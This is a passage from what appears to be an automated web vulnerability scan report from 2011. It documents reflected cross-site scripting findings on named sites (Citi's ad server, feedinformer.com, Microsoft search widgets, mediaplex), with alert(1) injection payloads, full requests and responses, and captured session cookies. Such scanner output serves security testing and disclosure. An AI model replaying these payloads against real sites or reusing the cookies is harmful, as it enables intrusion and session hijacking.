ATC9=6346d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd19IF0Vcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IF33cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IFATcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; AdData=S3C=1&S1C=1&S2=93926z285778&S2T=201107181027410014&S1T=201107181027400899&S1=100991z285777&S3T=201107181027410656&S3=98930z285779&S2C=1; ATV1=61512d1BROOEc1c4NTc8N2Jc3c62c30JIc120Tcc19QFc8ccc19QFccccc; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; ASB1=TX=1310999262&Pb=3&A=8&SID=5F11D94748094070B1511DC6879E889C&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=34845&Cr=98930&W=42831&Tr=42831&Cp=4861&P=285779&B=1; CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 17 Jul 2011 14:27:47 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Thu, 12-Jul-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE; path=/
Date: Mon, 18 Jul 2011 14:27:46 GMT
Connection: close
Content-Length: 58

var bt_ad_content2857809ab5c;alert(1)//6c36bc080fa=false;

3.30. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f24ed"%3balert(1)//9904462d3ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f24ed";alert(1)//9904462d3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285780&BT_CON=1&BT_PM=1&r=0.6521653183735907&_u=visitor&_d=http://www.citi.com&f24ed"%3balert(1)//9904462d3ab=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42945&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308597549&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIAS=0&VTILNK=0&SID=816F1D18DE4F4FD6AA3609CC099F2751&VTIVEN=1805; ASB18=TX=1310999261&Pb=3&A=8&SID=6EF947CD667D48E9889230E69F79EED5&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=101096&Cr=100991&W=54622&Tr=54622&Cp=5009&P=285777&B=18; ATV18=5921d1BROODc1c4SHc8N2Hc3c62c32JVc32N8cc1LAUc8ccc1LAUccccc; ASB9=TX=1310999261&Pb=3&A=8&SID=05504B672FAB48D2BDD435D2F63609B1&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=94295&Cr=93926&W=54614&Tr=54614&Cp=4519&P=285778&B=9; ATV9=24942d1BROODc1c4D7c8N2Ic3c62c2RN6c2S2Ncc1LAMc8ccc1LAMccccc; ATC9=6346d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd19IF0Vcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IF33cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd19IFATcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; AdData=S3C=1&S1C=1&S2=93926z285778&S2T=201107181027410014&S1T=201107181027400899&S1=100991z285777&S3T=201107181027410656&S3=98930z285779&S2C=1; ATV1=61512d1BROOEc1c4NTc8N2Jc3c62c30JIc120Tcc19QFc8ccc19QFccccc; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; ASB1=TX=1310999262&Pb=3&A=8&SID=5F11D94748094070B1511DC6879E889C&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=34845&Cr=98930&W=42831&Tr=42831&Cp=4861&P=285779&B=1; CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 17 Jul 2011 14:27:51 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S6C=1&S7=100969z285780&S7T=201107181027490155&S4T=201107181027510080&S3C=1&S4=99317z285780&S1C=3&S2=93926z285778&S2T=201107181027410014&S8C=1&S1T=201107181027500299&S1=100991z285777&S7C=1&S8=95350z285778&S8T=201107181027510293&S3T=201107181027410656&S3=98930z285779&S2C=1&S4C=2&S5=101161z285778&S5T=201107181027480734&S6T=201107181027490045&S6=101074z285779&S5C=1; expires=Fri, 16-Sep-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Thu, 12-Jul-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=E71BF466C1A64E6F871BFC50FF212EDE; path=/
Date: Mon, 18 Jul 2011 14:27:50 GMT
Connection: close
Content-Length: 2091

var bt_ad_content285780=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
ts/99316/CBNA_218x88_ebills.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=257373&BT_SID=105190&_u=visitor/_d=http%3A%2F%2Fwww%2Eciti%2Ecom/f24ed";alert(1)//9904462d3ab=1";var lf="lid=ILC-&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2FBT%5FBCID%3D257373%2FBT%5FSID%3D105190%2F%5Fu%3Dvisitor%2F%5Fd%3Dhttp%253A%252F%252Fwww%252Eciti%252Ecom%2
...[SNIP]...

3.31. http://feedinformer.com/search.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /search.php

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 531b6"><script>alert(1)</script>ededba709dd was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?uid=feedinformer4e2460a020afd3.36023234&src=d531b6"><script>alert(1)</script>ededba709dd HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 7669
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
<input type="hidden" name="src" value="d531b6"><script>alert(1)</script>ededba709dd">
...[SNIP]...

3.32. http://feedinformer.com/search.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /search.php

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde16"><script>alert(1)</script>aebb06e161b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?uid=feedinformer4e2460a020afd3.36023234bde16"><script>alert(1)</script>aebb06e161b&src=d HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 7654
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
<input type="hidden" name="uid" value="feedinformer4e2460a020afd3.36023234bde16"><script>alert(1)</script>aebb06e161b">
...[SNIP]...

3.33. http://feedinformer.com/tg.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedinformer.com
Path:   /tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d147'%3balert(1)//edbb7d96a6b was submitted in the uid parameter. This input was echoed as 9d147';alert(1)//edbb7d96a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=feedinformer4e2460a020afd3.360232349d147'%3balert(1)//edbb7d96a6b&src=&cat=general&kw=&sc=general HTTP/1.1
Host: feedinformer.com
Proxy-Connection: keep-alive
Referer: http://feedinformer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=feedinformer4e2460a020afd3.36023234

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:34:44 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1787
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=feedinformer4e2460a020afd3.360232349d147';alert(1)//edbb7d96a6b&d=feedinformer.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

3.34. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c423<img%20src%3da%20onerror%3dalert(1)>f43eef14872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c423<img src=a onerror=alert(1)>f43eef14872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&1c423<img%20src%3da%20onerror%3dalert(1)>f43eef14872=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc297183.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; msdn=L=1033; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007632265:ss=1311004920058

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 6e8306a3bc4b2bd19dff62179bbaac82
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Tue, 19 Jul 2011 07:52:36 GMT
Date: Mon, 18 Jul 2011 19:52:36 GMT
Content-Length: 12973
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&1c423<img src=a onerror=alert(1)>f43eef14872=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.35. http://i2.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /Search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b5871<img%20src%3da%20onerror%3dalert(1)>d631634abc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5871<img src=a onerror=alert(1)>d631634abc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Technet&loc=en-US&resref=71&addEnglish=&rn=&rq=&watermark=Forefront&focusOnInit=False&beta=0&iroot=forefront&cver=1864.870%0d%0a&b5871<img%20src%3da%20onerror%3dalert(1)>d631634abc6=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://social.technet.microsoft.com/Forums/en-us/category/forefront
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; ADS=SN=175A21EF; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007849522:ss=1311004920058; msdn=L=1033

Response

HTTP/1.1 200 OK
ntCoent-Length: 12995
Content-Type: application/x-javascript
ETag: ed09f2fad214cfa1a72fa599ad55a881
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12995
Cache-Control: public, max-age=43200
Expires: Tue, 19 Jul 2011 08:13:14 GMT
Date: Mon, 18 Jul 2011 20:13:14 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"allowEmptySearch":false,"appId":"2","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&refinement=71&beta=0&b5871<img src=a onerror=alert(1)>d631634abc6=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US\/forefront","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":
...[SNIP]...

3.36. http://i4.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /Search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 75386<img%20src%3da%20onerror%3dalert(1)>e6fccf2eac0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75386<img src=a onerror=alert(1)>e6fccf2eac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Technet&loc=en-US&resref=19&addEnglish=&rn=&rq=&watermark=Exchange&focusOnInit=False&beta=0&iroot=exchange&cver=1864.870%0d%0a&75386<img%20src%3da%20onerror%3dalert(1)>e6fccf2eac0=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=ccc32296-e228-4717-9770-f152ea499ab9&Microsoft.CreationDate=07/18/2011 19:42:23&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.NumberOfVisits=2&SessionCookie.Id=D3F156FE5E59413ECF79695756E37873; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:46:45&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=66&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=a7c04ce3fe1745ba9d34f1cfc103b2a7; ADS=SN=175A21EF; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311007849522:ss=1311004920058; msdn=L=1033

Response

HTTP/1.1 200 OK
ntCoent-Length: 12993
Content-Type: application/x-javascript
ETag: c904dacd640cacf6b557b5aaac55a85b
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12993
Cache-Control: public, max-age=43199
Expires: Tue, 19 Jul 2011 08:14:37 GMT
Date: Mon, 18 Jul 2011 20:14:38 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"allowEmptySearch":false,"appId":"2","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&refinement=19&beta=0&75386<img src=a onerror=alert(1)>e6fccf2eac0=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US\/exchange","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"
...[SNIP]...

3.37. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b918'%3balert(1)//60364513c23 was submitted in the mpck parameter. This input was echoed as 1b918';alert(1)//60364513c23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

